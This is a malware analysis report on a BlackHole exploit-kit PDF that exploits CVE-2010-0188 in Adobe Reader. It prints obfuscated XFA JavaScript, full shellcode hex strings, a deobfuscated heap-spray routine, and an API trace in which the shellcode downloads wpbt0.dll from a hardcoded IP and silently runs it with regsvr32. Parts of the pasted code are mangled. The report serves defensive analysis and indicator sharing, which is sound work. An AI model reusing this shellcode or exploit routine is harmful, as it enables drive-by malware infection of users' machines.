#Malware Analysis - BlackHole PDF CVE-2010-0188 Infector)

1. I supposed to paste this report to the VT comments, but for some reason I couldn't paste it well. So I put it here. Please refer to the below VT analysis URL for this analysis.
2. https://www.virustotal.com/file/f3836e899f2cef2338a31be6dae936f0e9ef53f43d677daacfd0e032b3a27253/analysis/
3. ==========================
4. Description:
5. ==========================
6. [code] This is the malicious PDF used by Exploit Pack (strongly suspected) blackhole for dropping the malware.
7. The malicious part in this PDF is in obfuscated JavaScript to exploit the privillege using CVE-2010-0188 & executing the shellcode to download and running the malware downloader trojan. [/code]
8. ==========================
9. Sample was found here:
10. ==========================
11. [code] --22:30:52-- hxxp://188.127.249.241/content/ap2.php?f=696
12. => 'ap2.php@f=696'
13. Connecting to 188.127.249.241:80... connected.
14. HTTP request sent, awaiting response... 200 OK
15. Length: 24,792 (24K) (application/pdf)
16. 100%(====================================>) 24,792 25.49K/s
17. 22:30:54 (25.47 KB/s) - 'ap2.php@f=696' saved (24792/24792) [/code]
18. *) PLEASE BE NOTED THE PATTERN OF THE URL MARKED ABOVE FOR THE FURTHER INFECTION INVESTIGATION
19. ==========================
20. The Malware Code:
21. ==========================
22. *) the malware code is located as an object in obfuscated javascript below:
23. [code] ＜h:xdp xmlns:h="http://ns.adobe.com/xdp/"＞
24. ＜asd/＞as＜config xmlns='123'＞＜asd/＞
25. ＜h:present＞
26. ＜pdf
27. ＞
28. ＜h:interactive＞1＜/h:interactive＞
29. ＜asd/＞a＜h:version＞1.5＜/h:version＞
30. a＜asd/＞
31. ＜/pdf＞
32. ＜/h:present＞
33. ＜asd/＞＜/config＞＜asd/＞
34. ＜template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'＞
35. ＜asd/＞
36. a＜subform name="a1"＞ ＜pageSet＞
37. ＜pageArea id="roteYom" name="roteYom"＞
38. ＜contentArea h="512pt" w="214pt" x="0.25in" y="0.25in"/＞
39. ＜medium long="792pt" short="612pt" stock="default"/＞
40. ＜/pageArea＞
41. ＜/pageSet＞
42. ＜subform name='asdvsa'＞＜field name='qwe123b'＞＜event activity='initialize'＞
43. ＜h:script contentType='application/x-javascript'＞
44.  
45. if(this)ar=「-4,
46.  
47. -3,
48.  
49. -2,
50. :
51. (continued for 6,000lines)
52. :
53.  
54. 21,
55.  
56. 22,
57.  
58. 5」;
59.  
60. function test3(){if (s)v=ar「z];s=s& amp;#43;cc[v+4]&#59;}
61. cc={q:"var pding;b,cefhots_x=w& amp;#65;y()l1'420657839u{.VS'<+I}*/DkR%-W[」mCj^?:LBKQYEUqFM"}.q&#59;
62. qq=& amp;#39;ghej4vabl'&#59;
q=qq[2」+qq[5]+qq[6];
q=& amp;#113;+qq[8];
b= {v:{q:{x:this}}}.v.q.x&#59;
w= {v:b「q]}.v&#59;
63. s=Array()&#59;
n={v:cc}.v;
for(i=0;i-3790<0&#59;i++){
64. z=i&#59;
test3()&#59;
65. 
}
w(s);

66. ＜/h:script＞a
67. ＜/event＞＜ui＞
68. ＜imageEdit/＞
69. ＜/ui＞
70. ＜/field＞
71. ＜/subform＞
72. ＜/subform＞＜/template＞a＜asd/＞a＜xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'＞
73. ＜xfa:data＞＜a1 test="123"＞
74. ＜/a1＞
75. ＜/xfa:data＞
76. ＜/xfa:datasets＞
77. ＜/h:xdp＞ [/code]
78.  
79. Deobfs above obfs javascript and found the eval with the below shellcode value:
80. [code] var _l1 = '
81. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
82. 0000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
83. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
84. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
85. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
86. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
87. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
88. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
89. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
90. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
91. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
92. 663d36393626653d340000';
93. var _l2 = '
94. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
95. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
96. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
97. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
98. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
99. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
100. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
101. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
102. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
103. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
104. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
105. 663d36393626653d340000'; [/code]
106.  
107. Complete deobfs will be something like this:
108. [code]
109. var padding;
110. var bbb, ccc, ddd, eee, fff, ggg, hhh;
111. var pointers_a, i;
112. var x = new Array();
113. var y = new Array();
114. var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
115. var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f663d36393626653d340000';
116. //_l3 = app;
117. _l4 = new Array();
118. function _l5()
119. {
120. var _l6 = _l3.viewerVersion.toString();
121. _l6 = _l6.replace('.', '');
122. while (_l6.length ＜ 4)_l6 += '0';
123. return parseInt(_l6, 10)
124. }
125. function _l7(_l8, _l9)
126. {
127. while (_l8.length * 2 ＜ _l9)_l8 += _l8;
128. return _l8.substring(0, _l9/2)
129. }
130. function _I0(_I1)
131. {
132. _I1=unescape(_I1);
133. roteDak=_I1.length*2;
134. dakRote=unescape('%u9090');
135. spray=_l7(dakRote,0x2000-roteDak);
136. loxWhee=_I1+spray;
137. loxWhee=_l7(loxWhee,524098);
138. for(i=0; i ＜ 400; i++)_l4「i」=loxWhee.substr(0,loxWhee.length-1)+dakRote;
139. }
140. function _I2(_I1,len)
141. {
142. while(_I1.length＜len)_I1+=_I1;
143. return _I1.substring(0,len)
144. }
145. function _I3(_I1)
146. {
147. ret='';
148. for(i=0;i＜_I1.length;i+=2)
149. {
150. b=_I1.substr(i,2);
151. c=parseInt(b,16);
152. ret+=String.fromCharCode(c);
153. }
154. return ret
155. }
156. function _ji1(_I1,_I4)
157. {
158. _I5='';
159. for(_I6=0;_I6＜_I1.length;_I6++)
160. {
161. _l9=_I4.length;
162. _I7=_I1.charCodeAt(_I6);
163. _I8=_I4.charCodeAt(_I6%_l9);
164. _I5+=String.fromCharCode(_I7^_I8);
165. }
166. return _I5
167. }
168. function _I9(_I6)
169. {
170. _j0=_I6.toString(16);
171. _j1=_j0.length;
172. _I5=(_j1%2)?'0'+_j0:_j0;
173. return _I5
174. }
175. function _j2(_I1)
176. {
177. _I5='';
178. for(_I6=0;_I6＜_I1.length;_I6+=2)
179. {
180. _I5+='%u';
181. _I5+=_I9(_I1.charCodeAt(_I6+1));
182. _I5+=_I9(_I1.charCodeAt(_I6))
183. }
184. return _I5
185. }
186. function _j3()
187. {
188. _j4=_l5();
189. _j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK' or _j5='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgED
190. AAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////;
191. _j6=_l1;
192. _j7=_I3(_j6)} [/code]
193. *) The above strings has similarity w/ the exploit in http://downloads.securityfocus.com/vulnerabilities/exploits/38195.py to be used to feed the crafted TIFF format to the adobe reader.
194.  
195. The shellcode (var _l2 & _l1) itself is using urlmon.dll and kernel.dll which is reversed as below:
196. strings :
197. [code] 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
198. 0000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b70
199. 1c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b75
200. 3c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e
201. 2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b6808
202. 8bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
203. 00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c7442404
204. 76723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d
205. 0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c3
206. 0ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b
207. 1bc64679361a2f70687474703a2f2f3138382e3132372e3234392e3234312f636f6e74656e742f772e7068703f
208. 663d36393626653d340000'; [/code]
209. ==========================
210. If you see it in ASCII it will be like this:
211. ==========================
212. [code] L.'....J<.'..c.J...J0..Jn/.JAAAA&................9.Jd.'.....AAAA
213. AAAAf......u4._3.d.@[email protected].^<.t3,[email protected]$..uQ
214. ..LQV.u<.t5x..V.v...3.IA....3....8.t......@..;.u.^.^$..f..K.F..T
215. $...........^Y..S..h..}[email protected]
216. U...^......hon..hurlmT........a......r.......\$...$regs.D$.vr32.
217. D$..-s.Sh.....V...3.Q.D..wpbt.D...dll.D...Y...0.D..AQj.j.SWj..V.
218. ..u.j.S.V.j....S.V........G.?.u.G.?.u.j.j..V.......N.......o..3.
219. .[..Fy6./phXXp://188.127.249.241/content/w.php?f=696&e=4.. [/code]
220. *) You'll see the download url of the trojan downloader up there.
221. ==========================
222. If we reverse shellcode means like below:
223. ==========================
224. [code]
225. 0x7c801ad9|kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)
226. 0x7c801d7b|kernel32.LoadLibraryA(lpFileName=urlmon)
227. 0x7c835dfa|kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])|
228. 0x1a494bbe|urlmon.URLDownloadToFileA(pCaller=0, szURL=http://188.127.249.241/content/w.php?f=696&e=4, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)|0
229. 0x7c86250d|kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
230. 0x7c86250d|kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)|
231. 0x7c81cb3b|kernel32.TerminateThread(dwExitCode=0) [/code]
232. ==========================
233. What it means?
234. ==========================
235. Means it downloaded from the marked url, and saved locally as wpbt0.dll & silently execute regsvr32 -s as process, for the infection. if you try to download the trojan, it wasn't there anymore, must be cleaned up, I guess this PDF infector was still in server during cleanup.
236. ==========================
237. Proof:
238. ==========================
239. [code] $ curl "http://188.127.249.241/content/w.php
240. ?f=696&e=4"
241. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
242. <html><head>
243. <title>404 Not Found</title>
244. </head><body>
245. <h1>Not Found</h1>
246. <p>The requested URL /content/w.php was not found on this server.</p>
247. <p>Additionally, a 404 Not Found
248. error was encountered while trying to use an ErrorDocument to handle the request
249. .</p>
250. <hr>
251. <address>Apache/2 Server at 188.127.249.241 Port 80</address>
252. </body></html> [/code]
253. ------
254. ZeroDay Japan http://0day.jp
255. OPERATION CLEANUP JAPAN | #OCJP
256. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
257. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com